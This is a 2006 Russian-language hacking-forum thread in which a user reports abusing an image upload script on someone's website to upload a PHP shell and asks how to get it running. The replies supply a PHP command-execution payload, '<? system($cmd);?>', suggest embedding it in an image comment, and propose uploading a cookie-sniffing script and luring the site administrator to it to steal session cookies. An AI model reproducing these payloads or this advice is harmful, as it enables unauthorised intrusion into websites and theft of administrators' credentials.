Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Зальем файлы на сайт через get_image.php |

07.05.2006, 23:08
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
Зальем файлы на сайт через get_image.php
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..
Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.
Все файлы появляются в папке /www.site.ru/img/
Какие есть варианты? 
|
|
|

08.05.2006, 10:50
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме: 2735257
Репутация:
103
|
|
Сообщение от djhoof
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..
Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.
Все файлы появляются в папке /www.site.ru/img/
Какие есть варианты? 
Если так то ничего! Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!
|
|
|

08.05.2006, 22:49
|
|
Новичок
Регистрация: 02.07.2005
Сообщений: 13
Провел на форуме: 62343
Репутация:
20
|
|
Вот в чем вся проблема (возможно  )
Для папки img присвоены низшие привилегии. А для доступа в остальные папки (www и ниже) могут требоваться root привилегии... Не обладая ими, твой shell не может выполнить определенные команды, поэтому отказывает грузиться. Выход... Даже не знаю... Можешь залить в папку img что-нить снифо-подобное и дать ссылу админу с сообщением об ошибке (ака дорогой администратор site.ru, обратясь по этому адресу www.site.ru/img/admin_kyky.php скрипт выдает ошибку). Так ты можешь получить c00kie$ администратора (если тебе оны нужны/если они вообще там есть =) )... Короче, мути сам =)
З.Ы.
Что касается system($cmd); - скорее всего, смысла не будет, т.к. и исполняемые приложения, и папки (где эти приложения находятся) тоже требуют root-a. Но, попытка не пытка =)
З.З.Ы
IMHO - не бить 
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|